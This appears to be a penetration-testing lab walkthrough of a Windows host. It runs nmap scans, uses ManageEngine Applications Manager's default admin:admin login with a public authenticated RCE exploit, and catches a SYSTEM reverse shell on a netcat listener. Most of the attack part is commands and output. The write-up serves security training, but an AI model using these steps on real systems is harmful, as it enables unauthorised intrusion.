Summary
We’ll exploit this machine with a remote code execution vulnerability in the ManageEngine application that uses the default admin user credentials. This application runs with SYSTEM privileges.
Enumeration
Let’s start the enumeration process with an nmap scan against all 65535 TCP ports.
kali@kali:~$ sudo nmap 192.168.120.143 -p-
Starting Nmap 7.70SVN ( <https://nmap.org> ) at 2020-09-14 18:52 EDT
Nmap scan report for 192.168.120.143
Host is up (0.024s latency).
Not shown: 65517 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
7680/tcp open pando-pub
12000/tcp open cce4x
22222/tcp open easyengine
40443/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49689/tcp open unknown
49719/tcp open unknown
49815/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 137.94 seconds
Let’s focus our attention on ports 12000,22222,40443 and run an nmap version scan. This reveals a potential web application on port 40443 which we may be able to use to gain an initial foothold.
kali@kali:~$ sudo nmap 192.168.120.143 -p12000,22222,40443 -sV
Starting Nmap 7.70SVN ( <https://nmap.org> ) at 2020-09-14 19:00 EDT
Nmap scan report for 192.168.120.143
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
12000/tcp open cce4x?
22222/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port12000-TCP:V=7.70SVN%I=7%D=9/14%Time=5F5FF66D%P=x86_64-unknown-linux
SF:-gnu%r(Kerberos,16,"\\0\\0\\0\\x12\\0\\tRECONNECT\\0\\x010\\0\\0\\0\\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port40443-TCP:V=7.70SVN%I=7%D=9/14%Time=5F5FF62E%P=x86_64-unknown-linux
SF:-gnu%r(GetRequest,246,"HTTP/1\\.1\\x20200\\x20\\r\\nSet-Cookie:\\x20JSESSIONI
SF:D_APM_40443=FBEC1596887D35EADBD9B4D0827530ED;\\x20Path=/;\\x20HttpOnly\\r\\
SF:nAccept-Ranges:\\x20bytes\\r\\nETag:\\x20W/\\"261-1591076589000\\"\\r\\nLast-Mo
SF:dified:\\x20Tue,\\x2002\\x20Jun\\x202020\\x2005:43:09\\x20GMT\\r\\nContent-Type
SF::\\x20text/html\\r\\nContent-Length:\\x20261\\r\\nDate:\\x20Mon,\\x2014\\x20Sep\\
SF:x202020\\x2023:01:02\\x20GMT\\r\\nConnection:\\x20close\\r\\nServer:\\x20AppMan
SF:ager\\r\\n\\r\\n<!--\\x20\\$Id\\$\\x20-->\\n<!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\"-//
SF:W3C//DTD\\x20HTML\\x204\\.01\\x20Transitional//EN\\">\\n<html>\\n<head>\\n<!--\\
SF:x20This\\x20comment\\x20is\\x20for\\x20Instant\\x20Gratification\\x20to\\x20wo
SF:rk\\x20applications\\.do\\x20-->\\n<script>\\n\\n\\twindow\\.open\\(\\"/webclient
SF:/common/jsp/home\\.jsp\\",\\x20\\"_top\\"\\);\\n\\n</script>\\n\\n</head>\\n</html
SF:>\\n")%r(HTTPOptions,841,"HTTP/1\\.1\\x20403\\x20\\r\\nSet-Cookie:\\x20JSESSIO
SF:NID_APM_40443=69F37E89F7AAFB54BF3F4C054B21F5EF;\\x20Path=/;\\x20HttpOnly\\
...
Navigating to the port with our web browser presents the ManageEngine Applications Manager web app, running Build No. 14700:
An EDB search for this version returns an Authenticated RCE vulnerability.
Knowing that this exploit requires credentials, we run a quick online search for manageengine default credentials which returns this page as the first result. This indicates that the default credentials for this application are admin:admin which we’ll include in the get_valid_cookie section of the exploit.
Exploitation
ManageEngine Authenticated Remote Code Execution
To begin our exploitation process, we’ll start a netcat listener on port 443.
kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...
Running the exploit results in a SYSTEM shell:
kali@kali:~$ python3 48793.py <http://192.168.120.143:40443> admin admin 192.168.118.11 443
[*] Visiting page to retrieve initial cookies...
[*] Retrieving admin cookie...
[*] Getting base directory of ManageEngine...
[*] Found base directory: C:\\Program Files\\ManageEngine\\AppManager14
[*] Creating JAR file...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
adding: weblogic/jndi/Environment.class(in = 1844) (out= 1078)(deflated 41%)
[*] Uploading JAR file...
[*] Attempting to upload JAR directly to targeted Weblogic folder...
[!] Failed to upload JAR directly, continue to add and execute job to move JAR...
[*] Creating a task to move the JAR file to relative path: classes/weblogic/version8/...
[*] Found actionname: move_weblogic_jar4825 with found actionid 10000003
[*] Executing created task with id: 10000003 to copy JAR...
[*] Task 10000003 has been executed successfully
[*] Deleting created task as JAR has been copied...
[*] Running the Weblogic credentialtest which triggers the code in the JAR...
[*] Check your shell...
kali@kali:~$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.118.11] from (UNKNOWN) [192.168.120.143] 50213
Microsoft Windows [Version 10.0.18362.1082]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\\Program Files\\ManageEngine\\AppManager14\\working>whoami
whoami
nt authority\\system
C:\\Program Files\\ManageEngine\\AppManager14\\working>
Discussion